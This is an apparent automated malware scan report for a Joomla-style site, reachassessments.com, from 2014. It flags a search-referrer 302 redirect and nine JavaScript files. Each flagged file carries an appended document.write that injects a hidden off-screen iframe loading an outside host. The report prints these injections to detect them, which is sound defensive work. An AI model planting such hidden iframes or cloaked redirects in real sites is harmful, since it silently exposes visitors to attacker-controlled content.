Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://reachassessments.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: reachassessments.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=60 Connection: close Date: Thu, 14 Aug 2014 05:55:19 GMT Location: http://tinyurl.com/cgwg7xc Server: Apache/2.2.17 (Unix) PHP/5.2.15 mod_ssl/2.2.17 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_scgi_pubsub/1.11-pubsub Content-Length: 0 Content-Type: text/html Expires: Thu, 14 Aug 2014 05:56:19 GMT MS-Author-Via: DAV P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 260b8138e9f7260cf514b71351391c87=9ace30fb49bc7020ab951e0c4f247eb1; path=/ X-Powered-By: PHP/5.2.15 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://reachassessments.com/ | 200 OK Content-Length: 52250 Content-Type: text/html | clean |
http://reachassessments.com/media/system/js/caption.js | 200 OK Content-Length: 2138 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/modules/mod_s5_live_search/js/s5_ls_fade.js | 200 OK Content-Length: 4356 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) s5_ls_Effects = {}; s5_ls_Effects.s5_ls_fade = function(s5_ls_id, s5_ls_opacStart, s5_ls_opacEnd, s5_ls_duration, s5_ls_callback) { s5_ls_Effects.s5_ls_changeOpacity(0, s5_ls_id); var s5_ls_speed = Math.round(s5_ls_duration/100); var s5_ls_timer = 0; if(s5_ls_opacStart > s5_ls_opacEnd) { for(var s5_ls_i=s5_ls_opacStart; s5_ls_i>=s5_ls_opacEnd; s5_ls_i--) { setTimeout("s5_ls_Effects.s5_ls_changeOpacity("+ s5_ls_i +", '"+ s5_ls_id +"', "+ s } if(ths.callback) ths.callback(result); } else { if(ths.error) ths.error(http.status); } } } this.http.send(null); }, init : function() {this.http = this.getHTTPObject();} } ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/modules/mod_s5_box/js/jquery.min.js | 200 OK Content-Length: 57469 Content-Type: application/javascript | clean |
http://reachassessments.com/modules/mod_s5_box/js/jquery.no.conflict.js | 200 OK Content-Length: 194 Content-Type: application/javascript | clean |
http://reachassessments.com/modules/mod_s5_box/js/jquery.colorbox.js | 200 OK Content-Length: 19041 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($) { var $overlay, $cbox, $wrap, $content, $topBorder, $leftBorder, $rightBorder, $bottomBorder, $related, $window, $loaded, $loadingOverlay, $loadingGraphic, $title, $current, $slideshow, $next, $prev, $close, publicMethod, interfaceHeight, interfaceWidth, loadedHeight, loadedWidth, maxWidth, maxHeight, element, index, settings, open, callback, colorbox = 'colorbox', hover = 'hover', prev, next, init, load, position, dimensions, slideshow, close publicMethod.close = close; publicMethod.load = load; publicMethod.position = position; publicMethod.dimensions = dimensions; publicMethod.element = function(){ return element; }; publicMethod.settings = defaults; $(function () { init(); }); }(jQuery)); ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/modules/mod_s5_frontpage_display2/s5_frontpage_display_2/class.noobSlide.packed.js | 200 OK Content-Length: 3144 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var noobSlide=new Class({initialize:function(a){this.items=a.items;this.mode=a.mode||'horizontal';this.modes={horizontal:['left','width'],vertical:['top','height']};this.size=a.size||965;this.box=a.box.setStyle(this.modes[this.mode][1],(this.size*this.items.length)+'px');this.button_event=a.button_event||'click';this.handle_event=a.handle_event||'click';this.interval=a.interval||5000;this.buttons={previous:[],next:[],play:[],playback:[],stop:[]};if(a.buttons){for(var b in a.buttons){this.addActi oEvent.initMouseEvent("click", true, true,window, 1, 1, 1, 1, 1, false, false, false, false, 0, s5fdtarget); s5fdtarget.dispatchEvent( oEvent ); } else if(document.fireEvent) { s5fdtarget.fireEvent("onclick"); } } ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/templates/fusion/js/s5_effects.js | 200 OK Content-Length: 544 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function s5besocialover() {document.getElementById("s5_besociald").style.display = "block";} function s5besocialout() {document.getElementById("s5_besociald").style.display = "none";} function s5donateover() {document.getElementById("s5_donate").style.display = "block";} function s5donateout() {document.getElementById("s5_donate").style.display = "none";} ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/templates/fusion/js/jquery13.js | 200 OK Content-Length: 117053 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof jQuery == 'undefined') { (function(){ var window = this, undefined, _jQuery = window.jQuery, _$ = window.$, jQuery = window.jQuery = window.$ = function( selector, context ) { return new jQuery.fn.init( selector, context ); }, quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/, isSimple = /^.[^:#\[\.,]*$/; jQuery.fn = jQuery.prototype = { init: function( selector, context ) { selector = s document.body["offset" + name], document.documentElement["offset" + name] ) : size === undefined ? (this.length ? jQuery.css( this[0], type ) : null) : this.css( type, typeof size === "string" ? size : size + "px" ); }; });})(); };document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/templates/fusion/js/jquery_no_conflict.js | 200 OK Content-Length: 194 Content-Type: application/javascript | clean |
http://reachassessments.com/templates/fusion/js/lytebox.js | 200 OK Content-Length: 38443 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Array.prototype.removeDuplicates = function () { for (var i = 1; i < this.length; i++) { if (this[i][0] == this[i-1][0]) { this.splice(i,1); } } } Array.prototype.empty = function () { for (var i = 0; i <= this.length; i++) { this.shift(); } } String.prototype.trim = function () { return this.replace(/^\s+|\s+$/g, ''); } function LyteBox() { this.theme = 'grey'; this.hideFlash = true; this.outerBorder = false; this.resizeSpeed = 8; this.maxOpacity }; if (window.addEventListener) { window.addEventListener("load",initLytebox,false); } else if (window.attachEvent) { window.attachEvent("onload",initLytebox); } else { window.onload = function() {initLytebox();} } function initLytebox() { myLytebox = new LyteBox(); };document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/templates/fusion/js/IEsuckerfish.js | 200 OK Content-Length: 665 Content-Type: application/javascript | clean |
http://reachassessments.com/modules/mod_s5_frontpage_display2/s5_frontpage_display_2/s5_checkactive.js | 200 OK Content-Length: 10823 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (document.images) { var s5imagel = new Array() s5imagel[0] = new Image(1,1) s5imagel[1] = new Image(1,1) var preImages = new Array(),s5fdcurrCount = 0 var s5fdloaded = new Array(),i,timerID } function preloadimages() { for (i = 0; i < imageURLs.length; i++) { preImages[i] = new Image() preImages[i].src = imageURLs[i]} for (i = 0; i < preImages.length; i++) { s5fdloaded[i] = false } s5fd_checkloads() } function s5fd_c document.getElementById("s5_fd2_7").className = "s5_fd_nonactive";} if (s5_fd2fvisible >= 8) { document.getElementById("s5_fd2_8").className = "s5_fd_active";} } window.setTimeout('s5_fd2checkactive()', 100); } s5_fd2checkactive(); ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com//modules/mod_s5_tabshow/s5_tabshow/iCarousel.js/ | 404 Not Found Content-Length: 537 Content-Type: text/html | clean |
http://reachassessments.com/test404page.js | 404 Not Found Content-Length: 504 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=reachassessments.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://reachassessments.com/
Result: reachassessments.com is not infected or malware details are not published yet.
Result: reachassessments.com is not infected or malware details are not published yet.